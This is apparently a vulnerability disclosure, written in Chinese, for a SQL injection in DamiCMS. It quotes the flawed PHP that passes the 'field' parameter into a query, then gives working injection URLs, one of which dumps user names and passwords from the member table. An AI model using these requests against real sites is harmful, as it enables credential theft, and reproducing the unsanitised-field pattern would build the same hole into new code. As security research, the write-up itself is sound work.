<ul><li>/Web/Lib/Action/ApiAction.class.php</li></ul><pre class="">$field =!empty($_REQUEST['field'])?inject_check($_REQUEST['field']):'';
$m=new Model($model,"",false);
//如果使用了分页,缓存也不生效
if($page){
import("@.ORG.Page"); //这里改成你的Page类
$count=$m->where($where)->count();
$total_page = ceil($count / $pagesize);
$p = new Page($count,$pagesize);
//如果使用了分页,num将不起作用
$t=$m->field($field)->where($where)->limit($p->firstRow.','.$p->listRows)->order($order)->select();
//echo $m->getLastSql();
$ret = array('total_page'=>$total_page,'data'=>$t);
}
</pre><p>因为注入点在field里,所以可以绕过查询的关键字,导致注入。当传入:</p><pre class="">s=/api/ajax_arclist/model/article/field/database()%23</pre><p>执行的SQL语句为:</p><pre class="">SELECT database()# FROM `dami_article`</pre><p>页面返回: </p><p><img alt="87035C9E-A360-4281-84EA-98941C54B6AE.png" src="https://images.seebug.org/@/uploads/1434694877018-87035C9E-A360-4281-84EA-98941C54B6AE.png" data-image-size="519,61"><br></p><p>证明漏洞存在。</p><p>访问地址:</p><pre class="">http://10.211.55.12/damicms/index.php?s=/api/ajax_arclist/model/article/field/username,userpwd%20from%20dami_member%23</pre><p>得到所有用户的帐号密码: </p><p><img alt="59028A1D-7EBE-46E7-AA40-66696D0046D6.png" src="https://images.seebug.org/@/uploads/1434694899736-59028A1D-7EBE-46E7-AA40-66696D0046D6.png" data-image-size="817,83"><br></p>
暂无评论